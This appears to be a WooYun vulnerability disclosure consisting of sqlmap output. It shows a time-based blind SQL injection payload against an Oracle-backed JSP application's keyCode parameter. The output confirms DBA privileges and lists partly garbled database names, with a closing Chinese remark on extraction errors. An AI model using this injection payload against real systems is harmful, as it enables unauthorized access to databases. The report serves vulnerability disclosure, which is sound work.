WooYun.org

---
Parameter: keyCode (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: currentPage=2&keyCode=question_glzb0' AND 8997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(80)||CHR(88)||CHR(106),5) AND 'KDNF'='KDNF&method=getQuestionByKeyCode2&pagesize=12&totalCount=14
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keyCode (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: currentPage=2&keyCode=question_glzb0' AND 8997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(80)||CHR(88)||CHR(106),5) AND 'KDNF'='KDNF&method=getQuestionByKeyCode2&pagesize=12&totalCount=14
---
web application technology: JSP
back-end DBMS: Oracle
current user:    'GLZQ'
current user is DBA:    True
available databases [16]:
[*] "BMSYS\X05"
[*] "CDB!"
[*] "CTXSZS\X05\X03\X05"
[*] "EXFSY]\X12"
[*] "GLZR\X0BC\T\X05\X02\X14\TA\X11!"1#"
[*] "MDSYS\X11E\X05!\T\NA\X03\X05\T"
[*] "S[SMAN"
[*] "SYTTEM\X05!\X11"
[*] "UYS!)A!!\X03"
[*] DaSNMP2
[*] ORDSYS
[*] OUTLN
[*] SCQVT
[*] SLAPSYS
[*] TSMSYS
[*] WMSYS
time跑出来的数据，网络不好可能有误差。